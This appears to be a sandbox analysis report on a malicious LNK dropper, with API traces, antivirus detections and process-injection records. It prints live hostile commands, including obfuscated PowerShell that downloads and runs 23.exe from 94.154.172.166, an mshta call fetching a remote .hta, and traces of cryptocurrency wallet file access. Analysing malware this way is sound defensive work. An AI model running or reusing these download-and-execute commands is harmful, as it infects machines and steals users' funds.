description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
host 41.216.183.3
host 94.154.172.166
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000170
1 0 0
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

 information_class: 8 (SystemProcessorPerformanceInformation)
1 0 0
description RegAsm.exe tried to sleep 676584702 seconds, actually delayed analysis time by 676584702 seconds
file C:\Users\test22\AppData\Roaming\Electrum\wallets
Time & API Arguments Status Return Repeated

RegSetValueExA

 key_handle: 0x000002dc
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
value: 0
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
1 0 0
file C:\Users\test22\AppData\Roaming\23.exe
wmi SELECT * FROM AntiVirusProduct
wmi SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
wmi SELECT Caption FROM Win32_OperatingSystem
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL‰'rà 0„v. À@ @…$.OÀ\à .  H.text€‚ „ `.rsrc\À†@@.reloc àŒ@B
base_address: 0x00400000
process_identifier: 2116
process_handle: 0x00000170
1 1 0

WriteProcessMemory

 buffer:  €P€8€€h€\ÀÌÌ4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°,StringFileInfo000004b0Comments"CompanyName*FileDescription0FileVersion1.0.0.04 InternalNameMseoc.exe&LegalCopyright*LegalTrademarks< OriginalFilenameMseoc.exe"ProductName4ProductVersion1.0.0.08Assembly Version1.0.0.0lÃê<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x0044c000
process_identifier: 2116
process_handle: 0x00000170
1 1 0

WriteProcessMemory

 buffer: x>
base_address: 0x0044e000
process_identifier: 2116
process_handle: 0x00000170
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2116
process_handle: 0x00000170
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL‰'rà 0„v. À@ @…$.OÀ\à .  H.text€‚ „ `.rsrc\À†@@.reloc àŒ@B
base_address: 0x00400000
process_identifier: 2116
process_handle: 0x00000170
1 1 0
Symantec ISB.Suspexec!gen48
ESET-NOD32 LNK/Agent.QK
Avast LNK:Agent-EJ [Trj]
ClamAV Lnk.Dropper.Agent-9982181-0
Sophos Troj/LnkObf-G
SentinelOne Static AI - Suspicious LNK
Google Detected
VBA32 Trojan.Link.ShellCmd
Zoner Probably Heur.LNKScript
Fortinet LNK/Agent.9982181!tr
AVG LNK:Agent-EJ [Trj]
Time & API Arguments Status Return Repeated

send

 buffer: tpf©Î®sY Ñ7ä\¤âè «ÐêÔR[ÖJ'êk£8/5 ÀÀÀ À 28/ÿwww.mediafire.com  
socket: 1436
sent: 121
1 121 0

send

 buffer: FBAsªö†°ýƃ55— fÌhö2:æ¦#?’¾æÃ|òÃu² o’³ ½§<ØÄiWí3؛Lví×æ>C]¨x0‡vŽ: ¤WÛk[f…uF9q<×>ië‘Í/çúŠVñ—\¯¬+8¬¥’ý°“a\´
socket: 1436
sent: 134
1 134 0

send

 buffer: l‚kuSìöâ±2ðˆ~á˜N…6.*ÀP)jß·ìa¾¸NDÿÔ R2‚"U;†ù7\¸„yƁAlH;@r¨bŒ6B”’¦ÖÝM åd”#²´è@‘Lõaü:…½…F÷ ¦2ý³Ï>©(™æ<È lîeÑâŸN Ó’± 8æ ÅÖv*ºÊΧ
socket: 1436
sent: 149
1 149 0

send

 buffer: }yf©Î®^h15Pœbȕïd 'lR²ð÷žÈžjÞߛ ˜ô/5 ÀÀÀ À 288ÿdownload2268.mediafire.com  
socket: 1944
sent: 130
1 130 0

send

 buffer: }yf©Î¯’$².ÚÜøáBYíütÁ2*ծݎ1N"³ˆ¹ /5 ÀÀÀ À 288ÿdownload2268.mediafire.com  
socket: 1944
sent: 130
1 130 0

send

 buffer: GET /rwrv/23.exe HTTP/1.1 Host: 94.154.172.166 Connection: Keep-Alive
socket: 908
sent: 75
1 75 0
Process injection Process 604 called NtSetContextThread to modify thread in remote process 2116
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 1995571652
registers.esp: 3406996
registers.edi: 0
registers.eax: 4206198
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000000fc
process_identifier: 2116
1 0 0
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\23.exe
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\file
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Roaming\23.exe"
parent_process powershell.exe martian_process "C:\Windows\system32\mshta.exe" http://94.154.172.166/rwrv/3007f.hta
file C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet
Process injection Process 2560 resumed a thread in remote process 2672
Process injection Process 604 resumed a thread in remote process 2116
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000334
suspend_count: 1
process_identifier: 2672
1 0 0

NtResumeThread

 thread_handle: 0x000000fc
suspend_count: 1
process_identifier: 2116
1 0 0
option -executionpolicy unrestricted value Attempts to bypass execution policy
option -executionpolicy unrestricted value Attempts to bypass execution policy
option -executionpolicy unrestricted value Attempts to bypass execution policy
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2676
thread_handle: 0x00000334
process_identifier: 2672
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $g='s:aLh43vArH20fMw6p917T/5.t'; &(-join($g[(996-996),(689-687),(-418+421)])) ~= (-join($g[(996-996),(689-687),(-418+421)])); ~= ^[ (-join($g[(294-280),(996-996),(725-721),(507-486),(689-687)])); foreach($n in @((386-382),(-941+966),(-367+392),(-106+123),(182-181),(979-957),(-369+391),(219-201),(-305+310),(-665+689),(-104+123),(-842+865),(-848+853),(792-768),(-440+459),(894-874),(407-396),(223-199),(-875+894),(575-559),(999-983),(217-195),(889-880),(-550+565),(220-211),(363-356),(716-694),(975-969),(-94+106),(-924+936),(699-679),(-806+819),(785-761),(-599+603),(1005-980),(-774+776))){$O+=$g[$n]}; ^[ $O;
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000033c
1 1 0

NtResumeThread

 thread_handle: 0x00000334
suspend_count: 1
process_identifier: 2672
1 0 0

NtResumeThread

 thread_handle: 0x000002d0
suspend_count: 1
process_identifier: 2672
1 0 0

NtResumeThread

 thread_handle: 0x00000324
suspend_count: 1
process_identifier: 2672
1 0 0

NtResumeThread

 thread_handle: 0x00000484
suspend_count: 1
process_identifier: 2672
1 0 0

CreateProcessInternalW

 thread_identifier: 2812
thread_handle: 0x00000488
process_identifier: 2808
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Windows\system32\mshta.exe" http://94.154.172.166/rwrv/3007f.hta
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x0000048c
1 1 0

NtResumeThread

 thread_handle: 0x000004d0
suspend_count: 1
process_identifier: 2672
1 0 0

NtResumeThread

 thread_handle: 0x00000104
suspend_count: 1
process_identifier: 2808
1 0 0

CreateProcessInternalW

 thread_identifier: 2952
thread_handle: 0x00000484
process_identifier: 2948
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function EBLtV($aGLtIzJ, $MUUDRGgw){[IO.File]::WriteAllBytes($aGLtIzJ, $MUUDRGgw)};function CYoLw($aGLtIzJ){if($aGLtIzJ.EndsWith((hSqAuyRUp @(21033,21087,21095,21095))) -eq $True){Start-Process (hSqAuyRUp @(21101,21104,21097,21087,21095,21095,21038,21037,21033,21088,21107,21088)) $aGLtIzJ}else{Start-Process $aGLtIzJ}};function QafjZdmi($HftxTOL){$OKwmuBS = New-Object (hSqAuyRUp @(21065,21088,21103,21033,21074,21088,21085,21054,21095,21092,21088,21097,21103));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$MUUDRGgw = $OKwmuBS.DownloadData($HftxTOL);return $MUUDRGgw};function hSqAuyRUp($Etijla){$tjIUffbkI=20987;$SoFQD=$Null;foreach($CtMXFLN in $Etijla){$SoFQD+=[char]($CtMXFLN-$tjIUffbkI)};return $SoFQD};function WVzMbSyaK(){$OFmSHhJ = $env:APPDATA + '\';$gvFjhd = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21102,21045,21034,21034,21106,21106,21106,21033,21096,21088,21087,21092,21084,21089,21092,21101,21088,21033,21086,21098,21096,21034,21089,21092,21095,21088,21082,21099,21101,21088,21096,21092,21104,21096,21034,21099,21038,21106,21101,21036,21094,21038,21041,21092,21106,21089,21093,21095,21042,21108,21034,21053,21084,21086,21094,21104,21099,21082,21058,21104,21092,21087,21088,21033,21099,21087,21089,21034,21089,21092,21095,21088));$XYuScZy = $OFmSHhJ + 'file';EBLtV $XYuScZy $gvFjhd;CYoLw $XYuScZy;;$FWEoWoo = QafjZdmi (hSqAuyRUp @(21091,21103,21103,21099,21045,21034,21034,21044,21039,21033,21036,21040,21039,21033,21036,21042,21037,21033,21036,21041,21041,21034,21101,21106,21101,21105,21034,21037,21038,21033,21088,21107,21088));$qXEYnMFd = $OFmSHhJ + '23.exe';EBLtV $qXEYnMFd $FWEoWoo;CYoLw $qXEYnMFd;;;}WVzMbSyaK;
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000488
1 1 0

NtResumeThread

 thread_handle: 0x00000470
suspend_count: 1
process_identifier: 2808
1 0 0

NtResumeThread

 thread_handle: 0x00000298
suspend_count: 1
process_identifier: 2948
1 0 0

NtResumeThread

 thread_handle: 0x000002ec
suspend_count: 1
process_identifier: 2948
1 0 0

NtResumeThread

 thread_handle: 0x00000448
suspend_count: 1
process_identifier: 2948
1 0 0

NtResumeThread

 thread_handle: 0x00000580
suspend_count: 1
process_identifier: 2948
1 0 0

NtResumeThread

 thread_handle: 0x00000388
suspend_count: 1
process_identifier: 2948
1 0 0

NtResumeThread

 thread_handle: 0x00000394
suspend_count: 1
process_identifier: 2948
1 0 0

CreateProcessInternalW

 thread_identifier: 812
thread_handle: 0x000007b4
process_identifier: 604
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Roaming\23.exe
track: 1
command_line: "C:\Users\test22\AppData\Roaming\23.exe"
filepath_r: C:\Users\test22\AppData\Roaming\23.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000007b8
1 1 0

NtResumeThread

 thread_handle: 0x000007cc
suspend_count: 1
process_identifier: 2948
1 0 0

NtResumeThread

 thread_handle: 0x00000134
suspend_count: 1
process_identifier: 604
1 0 0

CreateProcessInternalW

 thread_identifier: 2108
thread_handle: 0x000000fc
process_identifier: 2116
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
track: 1
command_line:
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000170
1 1 0

NtUnmapViewOfSection

 base_address: 0x00400000
region_size: 7405568
process_identifier: 2116
process_handle: 0x00000170
3221225497 0

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000170
1 0 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL‰'rà 0„v. À@ @…$.OÀ\à .  H.text€‚ „ `.rsrc\À†@@.reloc àŒ@B
base_address: 0x00400000
process_identifier: 2116
process_handle: 0x00000170
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00402000
process_identifier: 2116
process_handle: 0x00000170
1 1 0

WriteProcessMemory

 buffer:  €P€8€€h€\ÀÌÌ4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°,StringFileInfo000004b0Comments"CompanyName*FileDescription0FileVersion1.0.0.04 InternalNameMseoc.exe&LegalCopyright*LegalTrademarks< OriginalFilenameMseoc.exe"ProductName4ProductVersion1.0.0.08Assembly Version1.0.0.0lÃê<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x0044c000
process_identifier: 2116
process_handle: 0x00000170
1 1 0

WriteProcessMemory

 buffer: x>
base_address: 0x0044e000
process_identifier: 2116
process_handle: 0x00000170
1 1 0

NtGetContextThread

 thread_handle: 0x000000fc
1 0 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2116
process_handle: 0x00000170
1 1 0

NtSetContextThread

 registers.eip: 1995571652
registers.esp: 3406996
registers.edi: 0
registers.eax: 4206198
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000000fc
process_identifier: 2116
1 0 0

NtResumeThread

 thread_handle: 0x000000fc
suspend_count: 1
process_identifier: 2116
1 0 0

NtResumeThread

 thread_handle: 0x00000178
suspend_count: 1
process_identifier: 2116
1 0 0

NtResumeThread

 thread_handle: 0x000001ec
suspend_count: 1
process_identifier: 2116
1 0 0

NtResumeThread

 thread_handle: 0x00000228
suspend_count: 1
process_identifier: 2116
1 0 0

NtResumeThread

 thread_handle: 0x0000057c
suspend_count: 1
process_identifier: 2116
1 0 0

NtResumeThread

 thread_handle: 0x00000590
suspend_count: 1
process_identifier: 2116
1 0 0

NtResumeThread

 thread_handle: 0x00000310
suspend_count: 1
process_identifier: 2116
1 0 0

NtResumeThread

 thread_handle: 0x00000314
suspend_count: 1
process_identifier: 2116
1 0 0

NtResumeThread

 thread_handle: 0x000005d0
suspend_count: 1
process_identifier: 2116
1 0 0

NtResumeThread

 thread_handle: 0x000005d8
suspend_count: 1
process_identifier: 2116
1 0 0

NtResumeThread

 thread_handle: 0x000005ec
suspend_count: 1
process_identifier: 2116
1 0 0

NtResumeThread

 thread_handle: 0x000005fc
suspend_count: 1
process_identifier: 2116
1 0 0

NtResumeThread

 thread_handle: 0x00000614
suspend_count: 1
process_identifier: 2116
1 0 0
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Windows\System32\mshta.exe
file C:\Users\test22\AppData\Roaming\23.exe